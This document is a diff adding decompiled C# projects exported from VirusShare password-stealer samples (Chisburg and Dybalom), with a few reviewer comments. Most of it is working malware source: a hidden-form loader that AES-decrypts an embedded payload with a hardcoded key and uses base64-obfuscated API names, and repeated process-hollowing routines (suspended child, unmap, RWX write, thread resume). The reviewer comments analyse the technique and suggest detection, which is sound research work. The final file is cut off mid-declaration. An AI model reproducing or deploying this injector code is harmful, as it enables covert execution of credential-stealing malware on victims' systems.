using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
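Review bot: `ThreadSafeObjectProvider<T>.GetInstance` reads and writes `m_ThreadStaticValue`, but the class declares no such field, so the decompiler has dropped a compiler-generated member and the file cannot compile as shown. In the Visual Basic `My` template this is normally a `[ThreadStatic]` static field of type `T`. If the IL confirms that, restore it as `[ThreadStatic] private static T m_ThreadStaticValue;` with a comment saying it was re-added by hand. The rest of this class is stock `MyTemplate` boilerplate and carries nothing sample-specific.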
@@ -0,0 +1,236 @@
// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
public class Main : Form
{
private IContainer Components;
private StringBuilder đžhuxHŠhBqYDXmćIi;
[STAThread]
public static void Main() => Application.Run((Form) new Program.Main());
public Main()
{
this.Load += new EventHandler(this.Main_Load);
this.đžhuxHŠhBqYDXmćIi = new StringBuilder();
Application.EnableVisualStyles();
this.InitializeComponent();
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(1, 1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Name = nameof (Main);
this.Text = nameof (Main);
this.ResumeLayout(false);
this.PerformLayout();
}
protected override void Dispose(bool Disposing)
{
if (Disposing && this.Components != null)
this.Components.Dispose();
base.Dispose(Disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
}
public byte[] oBŠCJfŠIgbTTšNvribUA(byte[] NiwjwQĆNFSđZYšWnNw)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 5,
(byte) 8,
(byte) 8,
(byte) 6,
(byte) 7,
(byte) 7,
(byte) 3,
(byte) 1,
(byte) 5,
(byte) 2,
(byte) 5,
(byte) 6,
(byte) 4,
(byte) 7,
(byte) 3,
(byte) 4
};
rijndaelManaged.Key = new byte[16]
{
(byte) 4,
(byte) 3,
(byte) 7,
(byte) 4,
(byte) 6,
(byte) 5,
(byte) 2,
(byte) 5,
(byte) 1,
(byte) 3,
(byte) 7,
(byte) 7,
(byte) 6,
(byte) 8,
(byte) 8,
(byte) 5
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(NiwjwQĆNFSđZYšWnNw, 0, NiwjwQĆNFSđZYšWnNw.Length);
}
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
public T RđckvLgĐvXvrvosŠČK<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));
public bool bXwlfCFJQbtsuorRQbi(byte[] ZOkCiOcinđžXZđKuOk, string HwČećNđDAUctfmXzHOz)
{
Program.Main.DQđlyZXQKUljwcsižj dqđlyZxqkUljwcsižj = this.RđckvLgĐvXvrvosŠČK<Program.Main.DQđlyZXQKUljwcsižj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
Program.Main.KćHŠććvBVeZFNTHhnV hšććvBveZfntHhnV = this.RđckvLgĐvXvrvosŠČK<Program.Main.KćHŠććvBVeZFNTHhnV>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.fbođRGšŽcnČGpUycĐšĆ fbođRgšŽcnČgpUycĐšĆ = this.RđckvLgĐvXvrvosŠČK<Program.Main.fbođRGšŽcnČGpUycĐšĆ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
Program.Main.DćgbvŽfweaihibVilWoB dćgbvŽfweaihibVilWoB = this.RđckvLgĐvXvrvosŠČK<Program.Main.DćgbvŽfweaihibVilWoB>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
Program.Main.yŽĐJlaškvrrkćlOgtq žđJlaškvrrkćlOgtq = this.RđckvLgĐvXvrvosŠČK<Program.Main.yŽĐJlaškvrrkćlOgtq>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
Program.Main.ŠvlWžNWILiTčŠUUA švlWžNwiLiTčŠuua = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠvlWžNWILiTčŠUUA>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.ĆFnoPrdvŽĐPkđšwLGđm ćfnoPrdvŽđPkđšwLgđm = this.RđckvLgĐvXvrvosŠČK<Program.Main.ĆFnoPrdvŽĐPkđšwLGđm>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
Program.Main.ŠĆJĐčAPHHCodtSuo šćjĐčAphhCodtSuo = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠĆJĐčAPHHCodtSuo>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pĐUfJxXošTsYUQdVGx = new IntPtr[4];
byte[] yDoemFćaqJkćčIWLkh = new byte[68];
int int32_1 = BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, 60);
int int16 = (int) BitConverter.ToInt16(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 6));
IntPtr xDhpđBqŠIbJnLqEB = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 84)));
if (dqđlyZxqkUljwcsižj((string) null, new StringBuilder(HwČećNđDAUctfmXzHOz), zero1, zero1, false, 4, zero1, (string) null, yDoemFćaqJkćčIWLkh, pĐUfJxXošTsYUQdVGx))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (hšććvBveZfntHhnV(pĐUfJxXošTsYUQdVGx[1], numArray1))
{
IntPtr lHYtcldUušXrccECW = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr žEdXtvpRfDeJABydđZz = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (fbođRgšŽcnČgpUycĐšĆ(pĐUfJxXošTsYUQdVGx[0], lHYtcldUušXrccECW, ref zero2, (int) žEdXtvpRfDeJABydđZz, ref zero3) && šćjĐčAphhCodtSuo(pĐUfJxXošTsYUQdVGx[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 80)));
IntPtr ŽACĐbXomGGšŠAVyLčUć = dćgbvŽfweaihibVilWoB(pĐUfJxXošTsYUQdVGx[0], num1, num2, 12288, 64);
int int32_2 = ŽACĐbXomGGšŠAVyLčUć.ToInt32();
int čePWVČDEEĐrEBwPNTHUs;
int num3 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], ŽACĐbXomGGšŠAVyLčUć, ZOkCiOcinđžXZđKuOk, checked ((uint) (int) xDhpđBqŠIbJnLqEB), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, numArray2, checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, BitConverter.GetBytes(ŽACĐbXomGGšŠAVyLčUć.ToInt32()), checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
numArray1[44] = checked ((uint) (ŽACĐbXomGGšŠAVyLčUć.ToInt32() + BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, int32_1 + 40)));
int num8 = švlWžNwiLiTčŠuua(pĐUfJxXošTsYUQdVGx[1], numArray1) ? 1 : 0;
}
}
int num = (int) ćfnoPrdvŽđPkđšwLgđm(pĐUfJxXošTsYUQdVGx[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
private void Main_Load(object sender, EventArgs e)
{
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
this.bXwlfCFJQbtsuorRQbi(this.oBŠCJfŠIgbTTšNvribUA(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
this.Close();
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool DQđlyZXQKUljwcsižj(
string čuxXhččVĐćLVmnĐšbwu,
StringBuilder edbBlGCđplćZwQcrUĆOI,
IntPtr ZešwZPIyvHvČoZSIvPbh,
IntPtr JvNšXNeORĆabqvgj,
[MarshalAs(UnmanagedType.Bool)] bool PšgJŽvLFAYRxštšfXJZš,
int PPTČSttjioRfnqhNktqč,
IntPtr etbčaPćotOĆiuNmĆe,
string sĐRLLqtŠrSfPĆTCQUZiQ,
byte[] yDoemFćaqJkćčIWLkh,
IntPtr[] pĐUfJxXošTsYUQdVGx);
public delegate bool yŽĐJlaškvrrkćlOgtq(
IntPtr ĐlwXQfNHBwoŠRTDEŽačw,
IntPtr ŽACĐbXomGGšŠAVyLčUć,
byte[] ŠFOAwCVyIjjnIfNszč,
uint xDhpđBqŠIbJnLqEB,
int čePWVČDEEĐrEBwPNTHUs);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool fbođRGšŽcnČGpUycĐšĆ(
IntPtr pQkBZjĐEfmajnfFmXpz,
IntPtr lHYtcldUušXrccECW,
ref IntPtr JAŽšjKhuhXmEvtpgad,
int žEdXtvpRfDeJABydđZz,
ref IntPtr iLgVciRŽDAuežfgVvB);
public delegate IntPtr DćgbvŽfweaihibVilWoB(
IntPtr ĐmWmčWeAZHČČCvEPoĐšv,
IntPtr LRQdkćŽJĐFĆhQŠcčZbKn,
IntPtr rfšOKXhžUsgćVCXw,
int VggzYBwvcLixWćyV,
int ĐčfŽmhxZzbytRČmćvmv);
public delegate uint ŠĆJĐčAPHHCodtSuo(IntPtr RkĆBxđLGeUVpEšgrzĐ, IntPtr HnyšxĆUjĐyKlfračlI);
public delegate uint ĆFnoPrdvŽĐPkđšwLGđm(IntPtr ĆožBčliZRrŽBŽhGnvćy);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool KćHŠććvBVeZFNTHhnV(IntPtr kpFhettcmCyČfjOdJJQ, uint[] IRĐeHIAPŽAPŽdRehh);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool ŠvlWžNWILiTčŠUUA(IntPtr VScŽcČqZRPvYćBdaXK, uint[] ĐhQNPoXaĆsDDČrmP);
}
}
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: My.Resources.Resources
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace My.Resources
{
[StandardModule]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[HideModuleName]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) My.Resources.Resources.resourceMan, (object) null))
My.Resources.Resources.resourceMan = new ResourceManager("myfking", typeof (My.Resources.Resources).Assembly);
return My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => My.Resources.Resources.resourceCulture;
set => My.Resources.Resources.resourceCulture = value;
}
internal static byte[] glavni => (byte[]) RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject(nameof (glavni), My.Resources.Resources.resourceCulture));
}
}
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E99DB095-B9F7-43A4-AA7E-89FE696A4745}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>kripted</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program\Main.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="myfking.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "kripted", "Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.csproj", "{E99DB095-B9F7-43A4-AA7E-89FE696A4745}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E99DB095-B9F7-43A4-AA7E-89FE696A4745}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: htngj_hk, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F32262B8-8B0E-4BCF-81B4-4FFA9BB46B72
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
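Review bot: `IX.R` carries no analyst comment, and its bare numbers hide what it is: CreateProcess with creation flag `4` (suspended), then GetThreadContext, NtUnmapViewOfSection, VirtualAllocEx with `12288` and `64`, WriteProcessMemory, SetThreadContext and ResumeThread is process hollowing (MITRE ATT&CK T1055.012) of the `surrogateProcess` child with the PE image in `bytes`. I would put a header comment above `R` saying so, e.g. `// Process hollowing: child created suspended (4), image unmapped, buffer written into RWX memory (12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE), thread resumed.` That call sequence against a freshly created suspended child, together with the read-write-execute remote allocation, is the behaviour worth alerting on in endpoint telemetry, since the per-sample hash changes with every build. `Convert.ToInt32((string) null, 2)` in the section loop evaluates to `0` and deserves a one-word annotation. The identical file is added again in the next IX.cs section (assembly `46-dcrio`), so the same comment belongs there.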
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EECA1923-B24D-41DF-9711-024C45F2B59D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>htngj_hk</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "htngj_hk", "Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.csproj", "{EECA1923-B24D-41DF-9711-024C45F2B59D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
